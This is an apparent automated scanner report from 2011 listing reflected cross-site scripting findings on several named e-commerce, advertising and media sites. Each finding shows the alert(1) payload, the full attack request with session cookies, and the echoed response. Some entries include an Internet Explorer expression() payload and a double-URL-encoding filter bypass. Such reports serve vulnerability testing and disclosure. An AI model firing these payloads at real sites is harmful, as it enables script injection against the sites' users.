The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ef24</script><script>alert(1)</script>8b8d97eb0ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001&4ef24</script><script>alert(1)</script>8b8d97eb0ba=1 HTTP/1.1 Host: my-happyfeet.com Proxy-Connection: keep-alive Referer: http://my-happyfeet.com/cart.asp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH
Response
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 16:50:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Content-Length: 39857 Content-Type: text/html Cache-control: private
<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/). Any reproduction of site content or images without written ...[SNIP]... ecked); } function doupdate(){ document.forms.checkoutform.mode.value='update'; document.forms.checkoutform.action='cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001&4ef24</script><script>alert(1)</script>8b8d97eb0ba=1'; document.forms.checkoutform.onsubmit=''; document.forms.checkoutform.submit(); } var savemenuaction='saveitem'; function dosaveitem(lid){ if(savemenuaction=='saveitem'){ if(!checkcheck ...[SNIP]...
The value of the rp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdeac</script><script>alert(1)</script>ad279ee61f3 was submitted in the rp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001fdeac</script><script>alert(1)</script>ad279ee61f3 HTTP/1.1 Host: my-happyfeet.com Proxy-Connection: keep-alive Referer: http://my-happyfeet.com/cart.asp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH
Response
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 16:49:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: PleskWin MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Content-Length: 39841 Content-Type: text/html Cache-control: private
<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/). Any reproduction of site content or images without written ...[SNIP]... hecked); } function doupdate(){ document.forms.checkoutform.mode.value='update'; document.forms.checkoutform.action='cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001fdeac</script><script>alert(1)</script>ad279ee61f3'; document.forms.checkoutform.onsubmit=''; document.forms.checkoutform.submit(); } var savemenuaction='saveitem'; function dosaveitem(lid){ if(savemenuaction=='saveitem'){ if(!checkchecked ...[SNIP]...
The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 4c995%0aalert(1)//39aa684e7cf was submitted in the url parameter. This input was echoed as 4c995 alert(1)//39aa684e7cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml4c995%0aalert(1)//39aa684e7cf&container=peoplesense&parent=http://www.cloudscan.me/&mid=0&view=profile&libs=google.blog&d=0.556.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23666666%22,%22ENDCAP_LINK_COLOR%22:%22%233d74a5%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_HEADLINE_COLOR%22:%22%23666666%22,%22FONT_FACE%22:%22normal+normal+13px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif%22%7D%7D&communityId=00129212639365482611&caller=http://www.cloudscan.me/2011/03/smartermail-80-stored-xss-reflected-xss.html HTTP/1.1 Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209791819.1300632449.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=209791819.2120303763.1300632449.1300817215.1301068080.3
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c655e<script>alert(1)</script>3c3794184e6 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /10032/5d8526ab7c4243a9a90f4ea3af7d7ab9?callback=BF_PARTNER.gate_responsec655e<script>alert(1)</script>3c3794184e6&cb=931 HTTP/1.1 Host: pglb.buzzfed.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=ISO-8859-1 Server: lighttpd Content-Length: 70 Cache-Control: max-age=3600 Expires: Sat, 26 Mar 2011 21:36:24 GMT Date: Sat, 26 Mar 2011 20:36:24 GMT Connection: close
The value of the CART_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad4dd"><script>alert(1)</script>3aab9aad0e510441a was submitted in the CART_ID parameter. This input was echoed as ad4dd\"><script>alert(1)</script>3aab9aad0e510441a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /order/cart.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03ad4dd"><script>alert(1)</script>3aab9aad0e510441a&qty0=1&prod0=1523013&submit_type=cross_selling&Update=true&Checkout=true&Update=true HTTP/1.1 Host: secure.avangate.com Connection: keep-alive Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1 Cache-Control: max-age=0 Origin: https://secure.avangate.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--[if IE 9]> <meta http-equiv="X-UA-Compatible ...[SNIP]... <a href="/order/nojs.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03ad4dd\"><script>alert(1)</script>3aab9aad0e510441a" target="_blank"> ...[SNIP]...
5.52. https://secure.avangate.com/order/cart.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://secure.avangate.com
Path:
/order/cart.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1796"><script>alert(1)</script>4ed955d9ca569fbd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1796\"><script>alert(1)</script>4ed955d9ca569fbd4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /order/cart.php?CART_ID=28d9066c6ec8a32ef621f59af80/b1796"><script>alert(1)</script>4ed955d9ca569fbd452e03&qty0=1&prod0=1523013&submit_type=cross_selling&Update=true&Checkout=true&Update=true HTTP/1.1 Host: secure.avangate.com Connection: keep-alive Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1 Cache-Control: max-age=0 Origin: https://secure.avangate.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8
The value of the CART_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e831e"><script>alert(1)</script>4dbe77a7b98 was submitted in the CART_ID parameter. This input was echoed as e831e\"><script>alert(1)</script>4dbe77a7b98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order/checkout.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03e831e"><script>alert(1)</script>4dbe77a7b98 HTTP/1.1 Host: secure.avangate.com Connection: keep-alive Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--[if IE 9]> <meta http-equiv="X-UA-Compatible ...[SNIP]... <a href="/order/nojs.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03e831e\"><script>alert(1)</script>4dbe77a7b98" target="_blank"> ...[SNIP]...
5.54. https://secure.avangate.com/order/checkout.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://secure.avangate.com
Path:
/order/checkout.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c5c0"><script>alert(1)</script>476da428095 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c5c0\"><script>alert(1)</script>476da428095 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order/checkout.php?CART_ID=28d9066c6ec8a32ef621f59af805/3c5c0"><script>alert(1)</script>476da4280952e03 HTTP/1.1 Host: secure.avangate.com Connection: keep-alive Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8
The value of the prno request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3d6b"style%3d"x%3aexpression(alert(1))"7e03f89d48f1f098f was submitted in the prno parameter. This input was echoed as e3d6b"style="x:expression(alert(1))"7e03f89d48f1f098f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /shareit/checkout.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406&prno=1e3d6b"style%3d"x%3aexpression(alert(1))"7e03f89d48f1f098f&DELIVERY%5B0%5D=EML&WPRODUCTS%5B0%5D=1&MPRODUCT_ID=&RE_USERNAME=&RE_PASSWORD=®_NAME_RADIO=NAME&COMPANY=&SALUTATION=&FIRSTNAME=&LASTNAME=&D_STREET1=&D_STREET2=&D_CITY=&D_STATE_ID=&D_POSTALCODE=&D_COUNTRY_ID=400&VATID=&PHONE=&FAX=&EMAIL=&EMAIL_CONFIRM=&PAYMENTTYPE_ID=&CURRENCY_ID=USD&BUTTON_NEXT.x=11&BUTTON_NEXT.y=5&BUTTON_NEXT=Next&progress=ADDITIONAL&FROM_PERSONAL=1 HTTP/1.1 Host: secure.shareit.com Connection: keep-alive Referer: https://secure.shareit.com/shareit/checkout.html?PRODUCT[300261966]=1&HADD[300261966][ADDITIONAL1]=BITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D&hidecoupon=1 Cache-Control: max-age=0 Origin: https://secure.shareit.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=1023542538.20480.0000
Response
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 17:14:50 GMT Server: Apache P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI" Keep-Alive: timeout=5, max=5000 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 70594
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Fast Reports Inc. - Buy</title> <style type="text/css"> <!-- /*Hauptelemente*/ body { font-family : ...[SNIP]... <form action="checkout.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406&prno=1e3d6b"style="x:expression(alert(1))"7e03f89d48f1f098f" method="post" name="personal"> ...[SNIP]...
The value of the adRotationId request parameter is copied into the HTML document as plain text between tags. The payload 15362<script>alert(1)</script>c2ae901adec was submitted in the adRotationId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=1512115362<script>alert(1)</script>c2ae901adec&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Date: Thu, 31 Mar 2011 00:53:35 GMT Expires: Thu, 31 Mar 2011 00:53:36 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDQQTCCABA=BJDABGFBNKIJMNOLMEEHBLEG; path=/ X-Powered-By: ASP.NET Content-Length: 779 Connection: keep-alive
The value of the bannerCreativeAdModuleId request parameter is copied into the HTML document as plain text between tags. The payload 11b9c<script>alert(1)</script>0fafab07e80 was submitted in the bannerCreativeAdModuleId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=2115211b9c<script>alert(1)</script>0fafab07e80&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Date: Thu, 31 Mar 2011 00:53:46 GMT Expires: Thu, 31 Mar 2011 00:53:47 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDCSSDAQTD=DMFLEBDBFICMGDJEEAPNGJDN; path=/ X-Powered-By: ASP.NET Content-Length: 779 Connection: keep-alive
The value of the campaignId request parameter is copied into the HTML document as plain text between tags. The payload 9ff62<script>alert(1)</script>a02173191c0 was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=63309ff62<script>alert(1)</script>a02173191c0&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Date: Thu, 31 Mar 2011 00:53:43 GMT Expires: Thu, 31 Mar 2011 00:53:43 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDCSAQSSSA=ONHBGAMBKDGPKDOKOLCOCKME; path=/ X-Powered-By: ASP.NET Content-Length: 779 Connection: keep-alive
The value of the siteId request parameter is copied into the HTML document as plain text between tags. The payload 801ff<script>alert(1)</script>31ecc76c45b was submitted in the siteId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E801ff<script>alert(1)</script>31ecc76c45b&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Date: Thu, 31 Mar 2011 00:53:28 GMT Expires: Thu, 31 Mar 2011 00:53:28 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDCSCDADCC=GEJBKNEBJAEILNIPENOHAGGD; path=/ X-Powered-By: ASP.NET Content-Length: 779 Connection: keep-alive
The value of the syndicationOutletId request parameter is copied into the HTML document as plain text between tags. The payload 778a4<script>alert(1)</script>cb1fdeb4541 was submitted in the syndicationOutletId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146778a4<script>alert(1)</script>cb1fdeb4541&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Date: Thu, 31 Mar 2011 00:53:39 GMT Expires: Thu, 31 Mar 2011 00:53:40 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDCATAABCD=FNGFGBFBAEMHNKPEBBBEDMOA; path=/ X-Powered-By: ASP.NET Content-Length: 779 Connection: keep-alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f794%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2a4004720cf was submitted in the REST URL parameter 2. This input was echoed as 7f794</script><script>alert(1)</script>2a4004720cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/include7f794%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2a4004720cf/background.js?9 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Length: 17815 Content-Type: text/html Expires: Sat, 26 Mar 2011 20:36:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 26 Mar 2011 20:36:37 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... 5.pfxID="acg"; s_265.pageName=s_265.pfxID+" : "+pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ab3c"><script>alert(1)</script>489e273b4e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
